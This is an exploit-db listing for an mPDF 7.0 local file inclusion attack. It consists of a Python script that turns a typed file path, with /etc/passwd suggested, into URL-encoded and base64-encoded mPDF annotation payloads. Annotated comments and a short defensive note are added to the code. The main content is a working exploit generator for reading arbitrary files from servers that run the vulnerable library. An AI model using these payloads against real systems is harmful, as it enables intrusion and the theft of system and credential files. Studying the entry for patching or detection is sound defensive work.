mPDF 7.0 – Local File Inclusion

  • 作者: Musyoka Ian
    日期: 2022-08-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50995/
  • # Exploit Title: mPDF 7.0 - Local File Inclusion
    # Google Dork: N/A
    # Date: 2022-07-23
    # Exploit Author: Musyoka Ian
    # Vendor Homepage: https://mpdf.github.io/
    # Software Link: https://mpdf.github.io/
    # Version: CuteNews (sic; likely a template leftover, since the title and the "Tested on" line refer to mPDF 7.0.x)
    # Tested on: Ubuntu 20.04, mPDF 7.0.x
    # CVE: N/A
    
    #!/usr/bin/env python3
    
    from urllib.parse import quote
    from cmd import Cmd
    from base64 import b64encode
    
    class Terminal(Cmd):
        """Interactive prompt that treats each entered line as a file path.

        Nothing is sent over the network from here: every line is passed to
        payload_gen(), which only prints encoded strings to stdout.
        """

        prompt = "\nFile >> "

        def default(self, args):
            """Forward the raw input line, unvalidated, to payload_gen()."""
            # Cmd calls default() for any line that has no matching do_*
            # handler, so ordinary paths end up here; built-ins such as
            # "help" are still consumed by Cmd itself.
            payload_gen(args)
    def banner():
        """Print the tool's ASCII-art banner to stdout."""
        # NOTE: the literal is deliberately not a raw string. It contains one
        # real escape (a doubled backslash) next to several unrecognised ones,
        # which Python keeps as-is but warns about on recent versions.
        art = """________________ ______ _____ ___ _ _ 
     |__ \|__ \|____| |____/ _ \ \ \ / / | | (_) |
     _ __ ___| |__) | || | |__/ / | | | \ V /________ __ | | ____| |_ 
     | '_ ` _ \|___/| || |__|/ /| | | |> </ _ \ \/ / '_ \| |/ _ \| | __|
     | | | | | | || |__| | |/ / | |_| | / . \|__/><| |_) | | (_) | | |_ 
     |_| |_| |_|_||_____/|_| /_/ (_)___(_)_/ \_\\___/_/\_\ .__/|_|\___/|_|\__|
     | |
     |_| """
        print(art)
    def payload_gen(fname):
        """Print an mPDF ``<annotation>`` tag for *fname* in two encodings.

        The tag names *fname* in its ``file``, ``content`` and ``title``
        attributes. Two forms are written to stdout: the URL-encoded tag, and
        the base64 encoding of that URL-encoded string (not of the raw tag).
        Nothing is returned.

        Defensive note: per the advisory title, mPDF 7.0.x resolves the
        ``file`` attribute on the server while rendering (the rendering side
        is not shown in this script). Treat HTML handed to mPDF as untrusted:
        strip or reject ``<annotation>`` tags that carry a ``file`` attribute,
        and on mPDF releases that offer the ``allowAnnotationFiles`` setting
        keep it disabled.

        Args:
            fname: Path string typed at the prompt. It is interpolated into
                the tag verbatim; no quoting or validation is applied.
        """
        tag = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
        url_form = quote(tag)
        # base64 is layered on top of the URL-encoded text, so a consumer has
        # to undo base64 first and percent-decoding second.
        b64_form = b64encode(url_form.encode()).decode()

        print("[+] Replace the content with the payload below")
        print(f"Url encoded payload:\n{url_form}\n")
        print(f"Base64 encoded payload:\n{b64_form}\n")
    if __name__ == "__main__":
        # Script entry point: show the banner and a usage hint, then hand
        # control to the interactive prompt until the process is interrupted.
        banner()
        print("Enter Filename eg. /etc/passwd")
        Terminal().cmdloop()